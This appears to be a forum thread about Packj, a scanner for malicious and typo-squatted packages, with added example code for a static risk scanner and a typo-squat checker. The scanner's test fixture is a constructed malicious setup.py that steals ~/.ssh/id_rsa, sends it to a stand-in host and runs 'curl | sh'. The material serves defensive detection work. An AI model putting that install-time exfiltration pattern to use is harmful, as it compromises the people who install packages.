by ashishbijlani 1013 days ago
I've been building Packj [1] to detect dummy, malicious, abandoned, typo-squatting, and other "risky" PyPI/NPM/Ruby/PHP/Maven/Rust packages. It carries out static/dynamic/metadata analysis and scans for 40+ attributes such as num funcs/files, spawning of shell, use of SSH keys, network communication, use of decode+eval, mismatch of GitHub code vs packaged code (provenance), change in APIs across versions, etc. to flag risky packages.

1. https://github.com/ossillate-inc/packj
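A minimal version of the static "risky attribute" pass the post describes, added here as an illustration and not Packj's own code. It walks a Python module's AST and flags four of the listed signals (spawning of a shell/process, network imports, decode-then-eval, and string constants that reference SSH key material), counts functions, and sums illustrative weights into a score. Both sample sources, the attribute names, and the weights are constructed for this example; a real scanner would add dynamic and metadata signals on top.

```python
"""Toy static scanner for a few 'risky attribute' signals (added example, not Packj code)."""
import ast
from collections import Counter

# Dotted call names treated as shell/process spawning. subprocess.* is counted
# conservatively even when shell=True is absent.
SHELL_CALLS = {"os.system", "os.popen", "subprocess.Popen", "subprocess.run",
               "subprocess.call", "subprocess.check_output"}
NETWORK_MODULES = {"socket", "urllib", "http", "requests", "ftplib", "smtplib"}
DECODE_CALLS = {"base64.b64decode", "base64.b85decode", "codecs.decode",
                "zlib.decompress", "bytes.fromhex"}
EVAL_CALLS = {"eval", "exec"}
SSH_MARKERS = (".ssh", "id_rsa", "id_ed25519", "authorized_keys")
# Illustrative weights chosen for this example, not Packj's scoring.
WEIGHTS = {"decode_then_eval": 5, "spawns_shell": 3, "touches_ssh_keys": 3,
           "dynamic_eval": 2, "network_import": 1}


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


class RiskVisitor(ast.NodeVisitor):
    def __init__(self):
        self.findings = []  # (attribute, line number)

    @staticmethod
    def _top_module(name):
        return (name or "").split(".")[0]

    def visit_Import(self, node):
        if any(self._top_module(a.name) in NETWORK_MODULES for a in node.names):
            self.findings.append(("network_import", node.lineno))

    def visit_ImportFrom(self, node):
        if self._top_module(node.module) in NETWORK_MODULES:
            self.findings.append(("network_import", node.lineno))

    def visit_Call(self, node):
        name = dotted_name(node.func)
        if name in SHELL_CALLS:
            self.findings.append(("spawns_shell", node.lineno))
        if name in EVAL_CALLS:
            # A decode call anywhere inside the eval/exec arguments is the
            # classic obfuscation pattern; a plain eval is still noted.
            inner = {dotted_name(c.func) for c in ast.walk(node) if isinstance(c, ast.Call)}
            attr = "decode_then_eval" if inner & DECODE_CALLS else "dynamic_eval"
            self.findings.append((attr, node.lineno))
        self.generic_visit(node)

    def visit_Constant(self, node):
        if isinstance(node.value, str) and any(m in node.value for m in SSH_MARKERS):
            self.findings.append(("touches_ssh_keys", node.lineno))


def scan_source(source):
    """Return {'attributes': {name: count}, 'findings': [(name, lineno), ...]}."""
    tree = ast.parse(source)
    visitor = RiskVisitor()
    visitor.visit(tree)
    attributes = Counter(attr for attr, _ in visitor.findings)
    attributes["num_funcs"] = sum(
        isinstance(n, (ast.FunctionDef, ast.AsyncFunctionDef)) for n in ast.walk(tree))
    return {"attributes": dict(attributes),
            "findings": sorted(visitor.findings, key=lambda f: f[1])}


def risk_score(attributes):
    return sum(WEIGHTS.get(k, 0) * v for k, v in attributes.items())


# Constructed sample: a setup.py that reads an SSH key, ships it to a remote
# host and runs an encoded payload at install time (203.0.113.7 is a
# documentation-only address; nothing here is executed).
SAMPLE_MALICIOUS = '''\
import base64, os, socket
from setuptools import setup

def _post_install():
    key = open(os.path.expanduser("~/.ssh/id_rsa")).read()
    s = socket.create_connection(("203.0.113.7", 4444))
    s.sendall(key.encode())
    exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
    os.system("curl -s http://203.0.113.7/x | sh")

setup(name="requets", version="0.0.1")
'''

# Constructed benign sample for comparison.
SAMPLE_BENIGN = '''\
import json

def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    for label, src in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        report = scan_source(src)
        print(label, risk_score(report["attributes"]), report["findings"])
```

The visitor only sees what is written literally in the source, so `getattr(os, "sys" + "tem")` or a string assembled at runtime would slip past it; that gap is why the post pairs static analysis with dynamic tracing of installs.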

2 comments

Cool project. How do you feel about projects like OpenSSF scorecards or even the checks that socket.dev do today on these packages to help determine risk?

https://github.com/ossillate-inc/packj/blob/main/.packj.yaml

Secondly, what about impersonation where attackers imitate a popular package and its respective metadata?

Thanks! We need more such efforts to improve supply-chain security of open-source software.

Packj detects typo-squatting (impersonation) as well.
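One way to implement the typo-squatting check the reply refers to, added as an example and not Packj's own code. A candidate name is PEP 503-normalized, common affixes attackers bolt on ("python-", "-py", trailing digits) are stripped, visually confusable characters are folded (0 to o, 1 to l), and the result is compared with popular names using optimal string alignment distance, so a single adjacent transposition costs 1 rather than 2. `POPULAR`, the affix regex and the distance thresholds are assumptions constructed for this example.

```python
"""Toy typo-squat detector for package names (added example, not Packj code)."""
import re

# Constructed stand-in for a download-ranked list of popular PyPI names.
POPULAR = ["requests", "urllib3", "numpy", "setuptools", "python-dateutil",
           "pyyaml", "cryptography"]
# Affixes commonly added to a popular name to make a squat look legitimate.
AFFIX_RE = re.compile(r"^(python-|py-)|(-python|-py|\d+)$")
CONFUSABLES = str.maketrans({"0": "o", "1": "l"})


def normalize(name):
    """PEP 503 normalization: lowercase, runs of [-_.] become a single '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def fold(name):
    """Strip affixes and fold confusable characters on a normalized name."""
    return AFFIX_RE.sub("", name).translate(CONFUSABLES)


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidates(name, popular=POPULAR):
    """Popular names the candidate resembles, as (popular_name, distance).

    Returns [] when the candidate *is* a popular package, i.e. shares its
    PEP 503 identity, since that is the real package and not a squat."""
    n = normalize(name)
    popular_norm = {p: normalize(p) for p in popular}
    if n in popular_norm.values():
        return []
    hits = []
    for p, pn in popular_norm.items():
        # Compare raw normalized forms and affix-stripped/folded forms; keep the
        # closer one. Shorter names get a tighter threshold to limit noise.
        d = min(osa_distance(n, pn), osa_distance(fold(n), fold(pn)))
        if d <= (1 if len(pn) <= 6 else 2):
            hits.append((p, d))
    return sorted(hits, key=lambda h: (h[1], h[0]))


if __name__ == "__main__":
    for cand in ("reqeusts", "python-requests", "ur11ib3", "Requests", "flask"):
        print(cand, typosquat_candidates(cand))
```

A fixed edit-distance threshold is a blunt instrument: very short popular names (three or four characters) collide with many legitimate names, so a production check would weight by download counts and exclude names that were registered before the popular package they resemble.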

This is interesting! Implementing it today itself for my open source package development pipeline!